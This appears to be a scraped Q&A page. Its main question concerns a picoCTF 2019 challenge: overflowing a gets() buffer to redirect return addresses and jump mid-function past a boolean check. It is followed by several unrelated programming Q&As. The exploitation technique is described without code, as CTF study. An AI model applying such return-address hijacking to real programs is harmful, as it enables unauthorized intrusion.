Jumping to an address inside a function - security

While trying to solve a challenge from a past ctf event I came across a unique problem that required me to do the followings:
use the vulnerable method "gets()" to overflow the return address of the vuln function to another one and the stack cell that is above it to another one that gives the flag to create a rop chain.
Overflowing it required in such a way that a global boolean variable in the second method will be able to pass the following boolean condition: if(a && !a){; and then to proceed safely to the last function
This is obviously impossible, no boolean should be true and false at the same time, but if you are looking at the compiled assembly of it, it separates it to two different conditions, one that checks if its true and one that checks if its false, then the only option is to jump in between while taking into consideration that the default value of the boolean is false.
The result of overflowing to the middle address is an immediate termination of the program, while taking in consideration the fact that jumping to another method is required after landing in the middle of the second one it seems like the middle jump is making somthing in the leave and ret functions to be disturbed.
my question is:
is it possible to jump into the middle of a function without disturbing the "folding" of a function and making an error, if not why? and if yes, what is needed to do so?
with respect,
revolution
btw: aslr is activated, the program is written in c, the os is ubuntu 32 bit, the challenge is from pico ctf 2019 this question is a general one that came as an inspiration from a challenge in the event so write ups are not the answer in this case.

Related

Is there a (pattern?) name to various concurrent computation?

I am looking for the name and info on a pattern (?) that I'm contemplating. As I don't know the name, it's difficult to search for it.
Here's what I'm trying to do, with a totally hypothetical example...
find-flight ( trip-details, 'cheapest') :: flight
I have this public function, find-flight(...), that accepts 2 parameters, trip-details and some instruction to apply. It returns a single flight, not a list of them.
When I call it with 'cheapest', the function will wait for all available flight results to come in from expedia, travelocity, hotwire, etc, to assure the cheapest flight is found.
When I call it with 'shortest-flight', the function would do the same kind of underlying work as 'cheapest' but would return the shortest flight. I'm sure you can come up with other instructions to apply.
BUT! I'm specifically interested in a variant of this: the instruction (implied or not) would be 'I-am-filthy-rich-and-I-want-to-buy-a-ticket-now'. In other words, the function would call all the sources such as expedia, orbitz, etc, but would return the very first internally received result, at any price point.
I'm asking because I want my public function to be as quick as possible. I can think of a number of strategies that would make it respond fast, but I'm not sure that I know which approach would be best considering that the parameter is unknown until called, right?
So I'm thinking about writing various versions of this function that would all be called by the public version. It'd return the first result. Then, the other strategies could optionally be aborted. If I did that, I could get some metrics on the function and further optimize.
If I were to write this in Java, I'd have a bunch of future objects that the function would loop through to see which one is done first. I'd return that one.
What's that called?
It's been proposed that the pattern is called Promise Race

How to pass arguments to QTableWidget table cell signals in PyQt5 (PySide2)? [duplicate]

This question already has an answer here:
cellDoubleClicked text python
(1 answer)
Closed 3 years ago.
According to the API the PyQt5 or PySide cell oriented signals of a QTableWidget are supposed to receive two interger parameters for row, and column respectively. For example:
def cellClicked (row, column)
Now when I try to call them like that:
table=QTableWidget(5,5)
def slotCellClick1():
print('something')
table.cellClicked(0,0).connect(slotCellClick1)
, I get, TypeError: native Qt signal is not callable.
The compiling solution and so far described in examples is in this manner:
table.cellClicked.connect(slotCellClick1)
which works for cell click, in general.
Am I getting wrong the concept or there is still a way to address a specific cell signals with this api functions? Otherwise what would be the workaround to trigger specific cell click signals?
That's not how signals and slots work.
Toolkits, and APIs in general, use callbacks to notify the programmer when something happens, by calling a function to react to it; this approach usually provides an interface that can pass some arguments along with the notification.
Suppose you have a module that a certain point can change "something" in it, you want to be notified whenever that change happens and eventually do something with it:
# pseudo code
from some_api import some_object
def some_function(argument):
print("Something changed to {}!".format(argument))
some_object.set_something_changed_callback(some_function)
>>> some_object.change_something(True)
Something changed to True!
As you can see, the something_changed_callback is not about the possible value of "something", as the callback will be called anyway; if you want to react to a specific value of "something", you'll have to check that within the callback function.
While for simpler apis it's usually fine to have a set_*_changed_callback() for each possible case, in complex toolkits like Qt that would be unnecessary (adding thousands of functions, one for each signal) and confusing.
Qt (like other toolkits like Gtk) uses a similar callback technique but with an unified interface to connect all signals to their "callbacks"; the concept doesn't change that much, at least from the coding perspective, but it makes things easier.
Originally, the syntax was like this:
QObject.connect(some_object, SIGNAL("something_changed(bool)", some_function)
but since some years it's been simplified to the "new style" connection:
some_object.something_changed.connect(some_function)
which is almost the same as the above:
some_object.set_something_changed_callback(some_function)
So, long story short, you can't connect to a specific signal "result", you'll have to check it by yourself.
I can understand your point of view: «I'm interested in calling my slot only when the value is x/y/z». It would make sense, but that kind of interface could be problematic from the api implementation point of view.
Most importantly, a lot of signals emit objects that are class instancies (QModelIndex, QStandardItem, etc) that are created at runtime or even have parents that don't exist yet when you have to connect them, or are mutable objects (one might want to check if a list or dictionary is equal to the one emitted, or if is the same).
Also, some signals have multiple arguments, and one could be interested in checking only some or one of them, but that kind of checking would be almost impossible to create with a simple function argument without any possibility of error or exception. Let's say you want to connect to cellClicked whenever the column is 1, no matter what row; you'd probably think that a good way would be to use cellClicked(None, 1), cellClicked(False, 1) or cellClicked(-1, 1), but some signals actually return None, False or -1, so there wouldn't be a simple standardized way to tell "ignore that argument" (if not by using a custom type).
After searching I found an answer that answers my question for a specific case of cellDoubleClicked https://stackoverflow.com/a/46738897/3597222

Misuse of a variables value?

I came across an instance where a solution to a particular problem was to use a variable whose value when zero or above meant the system would use that value in a calculation but when less than zero would indicate that the value should not be used at all.
My initial thought was that I didn't like the multipurpose use of the value of the variable: a.) as a range to be using in a formula; b.) as a form of control logic.
What is this kind of misuse of a variable called? Meta-'something' or is there a classic antipattern that this fits?
Sort of feels like when a database field is set to null to represent not using a value and if it's not null then use the value in that field.
Update:
An example would be that if a variable's value is > 0 I would use the value if it's <= 0 then I would not use the value and decided to perform some other logic.
Values such as these are often called "distinguished values". By far the most common distinguished value is null for reference types. A close second is the use of distinguished values to indicate unusual conditions (e.g. error return codes or search failures).
The problem with distinguished values is that all client code must be aware of the existence of such values and their associated semantics. In practical terms, this usually means that some kind of conditional logic must be wrapped around each call site that obtains such a value. It is far too easy to forget to add that logic, obtaining incorrect results. It also promotes copy-and-paste code as the boilerplate code required to deal with the distinguished values is often very similar throughout the application but difficult to encapsulate.
Common alternatives to the use of distinguished values are exceptions, or distinctly typed values that cannot be accidentally confused with one another (e.g. Maybe or Option types).
Having said all that, distinguished values may still play a valuable role in environments with extremely tight memory availability or other stringent performance constraints.
I don't think what your describing is a pure magic number, but it's kind of close. It's similar to the situation in pre-.NET 2.0 where you'd use Int32.MinValue to indicate a null value. .NET 2.0 introduced Nullable and kind of alleviated this issue.
So you're describing the use of a variable who's value really means something other than it's value -- -1 means essentially the same as the use of Int32.MinValue as I described above.
I'd call it a magic number.
Hope this helps.
Using different ranges of the possible values of a variable to invoke different functionality was very common when RAM and disk space for data and program code were scarce. Nowadays, you would use a function or an additional, accompanying value (boolean, or enumeration) to determine the action to take.
Current OS's suggest 1GiB of RAM to operate correctly, when 256KiB was high very few years ago. Cheap disk space has gone from hundreds of MiB to multiples of TiB in a matter of months. Not too long ago I wrote programs for 640KiB of RAM and 10MiB of disk, and you would probably hate them.
I think it would be good to cope with code like that if it's just a few years old (refactor it!), and denounce it as bad practice if it's recent.

Programming style question on how to code functions

So, I was just coding a bit today, and I realized that I don't have much consistency when it comes to a coding style when programming functions. One of my main concerns is whether or not its proper to code it so that you check that the input of the user is valid OUTSIDE of the function, or just throw the values passed by the user into the function and check if the values are valid in there. Let me sketch an example:
I have a function that lists hosts based on an environment, and I want to be able to split the environment into chunks of hosts. So an example of the usage is this:
listhosts -e testenv -s 2 1
This will get all the hosts from the "testenv", split it up into two parts, and it is displaying part one.
In my code, I have a function that you pass it in a list, and it returns a list of lists based on you parameters for splitting. BUT, before I pass it a list, I first verify the parameters in my MAIN during the getops process, so in the main I check to make sure there are no negatives passed by the user, I make sure the user didnt request to split into say, 4 parts, but asking to display part 5 (which would not be valid), etc.
tl;dr: Would you check the validity of a users input the flow of you're MAIN class, or would you do a check in your function itself, and either return a valid response in the case of valid input, or return NULL in the case of invalid input?
Obviously both methods work, I'm just interested to hear from experts as to which approach is better :) Thanks for any comments and suggestions you guys have! FYI, my example is coded in Python, but I'm still more interested in a general programming answer as opposed to a language-specific one!
Good question! My main advice is that you approach the problem systematically. If you are designing a function f, here is how I think about its specification:
What are the absolute requirements that a caller of f must meet? Those requirements are f's precondition.
What does f do for its caller? When f returns, what is the return value and what is the state of the machine? Under what circumstances does f throw an exception, and what exception is thrown? The answers to all these questions constitute f's postcondition.
The precondition and postcondition together constitute f's contract with callers.
Only a caller meeting the precondition gets to rely on the postcondition.
Finally, bearing directly on your question, what happens if f's caller doesn't meet the precondition? You have two choices:
You guarantee to halt the program, one hopes with an informative message. This is a checked run-time error.
Anything goes. Maybe there's a segfault, maybe memory is corrupted, maybe f silently returns a wrong answer. This is an unchecked run-time error.
Notice some items not on this list: raising an exception or returning an error code. If these behaviors are to be relied upon, they become part of f's contract.
Now I can rephrase your question:
What should a function do when its caller violates its contract?
In most kinds of applications, the function should halt the program with a checked run-time error. If the program is part of an application that needs to be reliable, either the application should provide an external mechanism for restarting an application that halts with a checked run-time error (common in Erlang code), or if restarting is difficult, all functions' contracts should be made very permissive so that "bad input" still meets the contract but promises always to raise an exception.
In every program, unchecked run-time errors should be rare. An unchecked run-time error is typically justified only on performance grounds, and even then only when code is performance-critical. Another source of unchecked run-time errors is programming in unsafe languages; for example, in C, there's no way to check whether memory pointed to has actually been initialized.
Another aspect of your question is
What kinds of contracts make the best designs?
The answer to this question varies more depending on the problem domain.
Because none of the work I do has to be high-availability or safety-critical, I use restrictive contracts and lots of checked run-time errors (typically assertion failures). When you are designing the interfaces and contracts of a big system, it is much easier if you keep the contracts simple, you keep the preconditions restrictive (tight), and you rely on checked run-time errors when arguments are "bad".
I have a function that you pass it in a list, and it returns a list of lists based on you parameters for splitting. BUT, before I pass it a list, I first verify the parameters in my MAIN during the getops process, so in the main I check to make sure there are no negatives passed by the user, I make sure the user didnt request to split into say, 4 parts, but asking to display part 5.
I think this is exactly the right way to solve this particular problem:
Your contract with the user is that the user can say anything, and if the user utters a nonsensical request, your program won't fall over— it will issue a sensible error message and then continue.
Your internal contract with your request-processing function is that you will pass it only sensible requests.
You therefore have a third function, outside the second, whose job it is to distinguish sense from nonsense and act accordingly—your request-processing function gets "sense", the user is told about "nonsense", and all contracts are met.
One of my main concerns is whether or not its proper to code it so that you check that the input of the user is valid OUTSIDE of the function.
Yes. Almost always this is the best design. In fact, there's probably a design pattern somewhere with a fancy name. But if not, experienced programmers have seen this over and over again. One of two things happens:
parse / validate / reject with error message
parse / validate / process
This kind of design has one data type (request) and four functions. Since I'm writing tons of Haskell code this week, I'll give an example in Haskell:
data Request -- type of a request
parse :: UserInput -> Request -- has a somewhat permissive precondition
validate :: Request -> Maybe ErrorMessage -- has a very permissive precondition
process :: Request -> Result -- has a very restrictive precondition
Of course there are many other ways to do it. Failures could be detected at the parsing stage as well as the validation stage. "Valid request" could actually be represented by a different type than "unvalidated request". And so on.
I'd do the check inside the function itself to make sure that the parameters I was expecting were indeed what I got.
Call it "defensive programming" or "programming by contract" or "assert checking parameters" or "encapsulation", but the idea is that the function should be responsible for checking its own pre- and post-conditions and making sure that no invariants are violated.
If you do it outside the function, you leave yourself open to the possibility that a client won't perform the checks. A method should not rely on others knowing how to use it properly.
If the contract fails you either throw an exception, if your language supports them, or return an error code of some kind.
Checking within the function adds complexity, so my personal policy is to do sanity checking as far up the stack as possible, and catch exceptions as they arise. I also make sure that my functions are documented so that other programmers know what the function expects of them. They may not always follow such expectations, but to be blunt, it is not my job to make their programs work.
It often makes sense to check the input in both places.
In the function you should validate the inputs and throw an exception if they are incorrect. This prevents invalid inputs causing the function to get halfway through and then throw an unexpected exception like "array index out of bounds" or similar. This will make debugging errors much simpler.
However throwing exceptions shouldn't be used as flow control and you wouldn't want to throw the raw exception straight to the user, so I would also add logic in the user interface to make sure I never call the function with invalid inputs. In your case this would be displaying a message on the console, but in other cases it might be showing a validation error in a GUI, possibly as you are typing.
"Code Complete" suggests an isolation strategy where one could draw a line between classes that validate all input and classes that treat their input as already validated. Anything allowed to pass the validation line is considered safe and can be passed to functions that don't do validation (they use asserts instead, so that errors in the external validation code can manifest themselves).
How to handle errors depends on the programming language; however, when writing a commandline application, the commandline really should validate that the input is reasonable. If the input is not reasonable, the appropriate behavior is to print a "Usage" message with an explanation of the requirements as well as to exit with a non-zero status code so that other programs know it failed (by testing the exit code).
Silent failure is the worst kind of failure, and that is what happens if you simply return incorrect results when given invalid arguments. If the failure is ever caught, then it will most likely be discovered very far away from the true point of failure (passing the invalid argument). Therefore, it is best, IMHO to throw an exception (or, where not possible, to return an error status code) when an argument is invalid, since it flags the error as soon as it occurs, making it much easier to identify and correct the true cause of failure.
I should also add that it is very important to be consistent in how you handle invalid inputs; you should either check and throw an exception on invalid input for all functions or do that for none of them, since if users of your interface discover that some functions throw on invalid input, they will begin to rely on this behavior and will be incredibly surprised when other function simply return invalid results rather than complaining.

Is the valid state domain of a program a regular language?

If you look at the call stack of a program and treat each return pointer as a token, what kind of automata is needed to build a recognizer for the valid states of the program?
As a corollary, what kind of automata is needed to build a recognizer for a specific bug state?
(Note: I'm only looking at the info that could be had from this function.)
My thought is that if these form regular languages than some interesting tools could be built around that. E.g. given a set of crash/failure dumps, automatically group them and generate a recognizer to identify new instances of know bugs.
Note: I'm not suggesting this as a diagnostic tool but as a data management tool for turning a pile of crash reports into something more useful.
"These 54 crashes seem related, as do those 42."
"These new crashes seem unrelated to anything before date X."
etc.
It would seem that I've not been clear about what I'm thinking of accomplishing, so here's an example:
Say you have a program that has three bugs in it.
Two bugs that cause invalid args to be passed to a single function tripping the same sanity check.
A function that if given a (valid) corner case goes into an infinite recursion.
Also as that when the program crashes (failed assert, uncaught exception, seg-V, stack overflow, etc.) it grabs a stack trace, extracts the call sites on it and ships them to a QA reporting server. (I'm assuming that only that information is extracted because 1, it's easy to get with a one time per project cost and 2, it has a simple, definite meaning that can be used without any special knowledge about the program)
What I'm proposing would be a tool that would attempt to classify incoming reports as connected to one of the known bugs (or as a new bug).
The simplest thing would be to assume that one failure site is one bug, but in the first example, two bugs get detected in the same place. The next easiest thing would be to require the entire stack to match, but again, this doesn't work in cases like the second example where you have multiple pieces of (valid) valid code that can trip the same bug.
The return pointer on the stack is just a pointer to memory. In theory if you look at the call stack of a program that just makes one function call, the return pointer (for that one function) can have different value for every execution of the program. How would you analyze that?
In theory you could read through a core dump using a map file. But doing so is extremely platform and compiler specific. You would not be able to create a general tool for doing this with any program. Read your compiler's documentation to see if it includes any tools for doing postmortem analysis.
If your program is decorated with assert statements, then each assert statement defines a valid state. The program statements between the assertions define the valid state changes.
A program that crashes has violated enough assertions that something broken.
A program that's incorrect but "flaky" has violated at least one assertion but hasn't failed.
It's not at all clear what you're looking for. The valid states are -- sometimes -- hard to define but -- usually -- easy to represent as simple assert statements.
Since a crashed program has violated one or more assertions, a program with explicit, executable assertions, doesn't need an crash debugging. It will simply fail an assert statement and die visibly.
If you don't want to put in assert statements then it's essentially impossible to know what state should have been true and which (never-actually-stated) assertion was violated.
Unwinding the call stack to work out the position and the nesting is trivial. But it's not clear what that shows. It tells you what broke, but not what other things lead to the breakage. That would require guessing what assertions where supposed to have been true, which requires deep knowledge of the design.
Edit.
"seem related" and "seem unrelated" are undefinable without recourse to the actual design of the actual application and the actual assertions that should be true in each stack frame.
If you don't know the assertions that should be true, all you have is a random puddle of variables. What can you claim about "related" given a random pile of values?
Crash 1: a = 2, b = 3, c = 4
Crash 2: a = 3, b = 4, c = 5
Related? Unrelated? How can you classify these without knowing everything about the code? If you know everything about the code, you can formulate standard assert-statement conditions that should have been true. And then you know what the actual crash is.

Resources